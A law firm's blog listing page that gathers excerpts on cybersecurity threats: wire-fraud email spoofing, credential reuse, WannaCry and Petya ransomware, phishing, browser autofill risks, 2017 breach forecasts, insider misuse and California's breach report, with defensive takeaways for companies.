Every day all over the world, companies fall victim to cybersecurity attacks. It’s nearly a constant these days. Many of these attacks are preventable with the right amount of attention to detail in system setup and hardening. The three common themes in postmortem examination of all of these attacks boil down to 1) human error; 2) configuration error; 3) failing to proactively defend. In this series of six posts, we will dive into each attack’s anatomy, the attack vector, and the ways companies can attempt to avoid being victim to them. In the last post, guest bloggers from G2 Insurance will walk through how insurance companies react to claims, what to watch out for in your policies, and appropriate coverage levels for cyber insurance based on their experience handling claims.

#1 Email Spoofing and Wire Fraud

This attack is essentially a wire instruction interception/redirection or wholly fake request for a transfer. This is an event that comes up daily or at least weekly in any cybersecurity professional’s world. This attack typically plays out with a threat actor masquerading as a legitimate authority within a company, typically someone in the C-suite or Director level. To make it successful, the recipient of the wire transfer request has to believe it’s legitimately originating from one of those authoritative people.

One way attackers do this is using actual stolen credentials. Despite the flood of data security breaches and database hacks, people unfortunately still use weak passwords and also re-use passwords. We have seen dozens of instances of successful credential attacks where the attacker used publicly available database leak information to gain unauthorized access to corporate accounts. The approach goes like this: an attacker harvests information regarding corporate leadership from various data sources about companies (LinkedIn, Dunn & Bradstreet, Bloomberg, Google Finance) and chooses a few people to target. They then cross-reference those names to leaked credential databases, often times hosted on Darkweb sites, IRC chat rooms, or other forums dedicated to hacking. If the attacker is able to find other accounts belonging to their targets that have been compromised and have a password, they can try that password, and tens of thousands of variations of it, to attack the corporate account of their victim.

Yesterday, organizations around the world were hit by yet another ransomware attack. Similar to the recent WannaCry attacks, the Petya attack works to encrypt documents and files and subsequently demands a ransom to unlock them. Unlike WannaCry, it is believed that the Petya attack spreads internally through an organization (rather than across the Internet) using…

Recently, a widespread global ransomware attack has struck hospitals, communication, and other types of companies and government offices around the world, seizing control of affected computers until the victims pay a ransom. This widespread ransomware campaign has affected various organizations with reports of tens of thousands of infections in as many as 99 countries, including the United States, United Kingdom, Spain, Russia, Taiwan, France, and Japan. The software can run in as many as 27 different languages. The latest version of this ransomware variant, known as WannaCry, WCry, or Wanna Decryptor, was discovered the morning of May 12, 2017, by an independent security researcher and has spread rapidly.…Continue Reading

Another week, another well-concocted phishing scam. The most recent fraudulent activity targeted businesses that use Workday, though this is not a breach or vulnerability in Workday itself. Specifically, the attack involves a well-crafted spam email that is sent to employees purporting to be from the CFO, CEO, or Head of HR or similar. Sometimes the…

A Finnish web developer discovered that “autofill profiles” now offered on certain browsers provides hackers with a new phishing vector. Autofill profiles allow users to create a profile containing preset personal information that they might usually enter on web forms. When a user fills in information for some simple text boxes, the autofill system will input other profile-based information into any other text boxes on the page, even when they are not visible on the page to the user and, from there, the hacker harvests additional autofilled personal information without the user’s knowledge.

Autofill profiles are not to be confused with form field autofilling behavior, which allows the user to fill in one form field at a time with data previously entered in those fields, while autofill profiles in browsers enable users to fill in an entire web form with one click. …Continue Reading

As we begin the new year, companies are continuing to survey the ever-changing data-breach landscape and assess their own preparedness for the worst. And with data security threats becoming more complex, sophisticated, and diverse every year, it is no small task. For those of you wondering what data breach trends might look like this year, and what to do to avoid them, Experian Data Breach Resolution, drawing on its experience with over 17,000 data breaches over the last decade, offered the following five predictions in its 2017 Data Breach Industry Forecast:

Aftershock password breaches will expedite the death of the password.

What and Why: Companies will face the consequences of previous data breaches, as username and password information breached years prior (and often from an unrelated company) is continued to be sold through darknet markets.

The Takeaway: Companies should consider (1) using multi-factor authentication to verify users to help solve the password reuse problem; (2) accounting for aftershock breaches in their data-breach response plans; and (3) educating customers about resetting their passwords and about the broader risk associated with password reuse across websites.

Nation-state cyberattacks will move from espionage to war.

What and Why: Cyberattacks by hackers sponsored by foreign nations will likely continue to increase and escalate. Although these attacks are motivated by the desire to gain intelligence, they will lead to collateral damage to consumers and businesses through widespread outages or exposure of personal information.

The Takeaway: Businesses should prepare for large-scale attacks, particularly if they are a part of critical infrastructure, by staying vigilant about their security measures and by considering purchasing proper insurance protection.

Healthcare organizations will be the most targeted sector with new, sophisticated attacks emerging.

What and Why:

Medical identity theft will remain cybercriminals’ top target, as medical information is lucrative and easy to exploit.

Experian predicts that in the new year mega breaches will move on from focusing on healthcare insurers to distributed hospital networks, which might have more security challenges compared to centralized organizations.

Experian also predicts that electronic health records (EHRs) will likely be a primary target for attackers, since EHRs are widely used and are likely to touch a compromised computer.

The top breach vector will likely be ransomware because a disruption of healthcare system operations could be catastrophic and most organizations would rather opt to simply pay the ransom than fight the attack. According to the recent Office of Civil Rights (OCR) guidance, depending on the facts, ransomware attacks may be classified as breaches and require notification under the HIPAA Breach Notification Rule, in accordance with 45 CFR 164.404.

The Takeaway: Healthcare organizations need to ensure they have proper, up-to-date security measures in place, including data-breach response plans in the event of a ransomware attack and adequate employee training about the importance of security.

We have all heard this before, but just how bad things really are? According to Verizon’s 2016 Data Breach Investigations Report (“DBIR”), insider and privilege misuse was once again one of the leading causes of incidents and breaches in 2015, accounting for 10,489 total incidents, 172 with confirmed data disclosure. Some of this misuse is perpetrated by malicious actors driven by motivation of financial gain and some of it is due to actions of well-meaning employees who either lacked cybersecurity awareness or simply made a mistake.

While there are no perfect answers for addressing the multitude of possible insider attacks, which can range from privilege abuse, to data mishandling, to the use of unapproved hardware, software, and workarounds, to email misuse, implementing the steps below can go a long way in reducing the risks.

On February 16, 2016, California Attorney General Kamala D. Harris released the California Data Breach Report 2012-2015 (the “Report”), which provided a comprehensive analysis of the data breaches reported to the Attorney General’s office during the covered years, as well as set forth concrete recommendation for minimum data security that would be considered “reasonable” under California law.

According to the Report, in the past four years, the Attorney General has received reports on 657 data breaches, affecting a total of over 49 million records of Californians. These breaches occurred in all sectors of the economy. The greatest threat to security, both in the number of breaches and the number of records breached, was presented by malware and hacking, followed by physical breaches, breaches caused by insider errors, and breaches caused by insider misuse. The most breached data types were Social Security numbers and medical information.

About Seyfarth's eDiscovery and Information Governance Team

Seyfarth Shaw’s eDiscovery and Information Governance (eDIG) attorneys dedicate 100% of their practices to eDiscovery and information governance issues, advising and litigating on these complex matters efficiently, effectively and creatively. Seyfarth is one of the few law firms with a truly dedicated eDiscovery practice group — one that began well before the Federal Rules of Civil Procedure were amended in 2006. We bring experience and talent to craft practical and defensible approaches to meet discovery obligations in litigation to comply with statutory and regulatory rules while managing the costs and the realities of operating a business in today’s economy. We have worked with some of the country’s largest companies on eDiscovery issues in specific major litigation as well as broader strategic approaches to eDiscovery.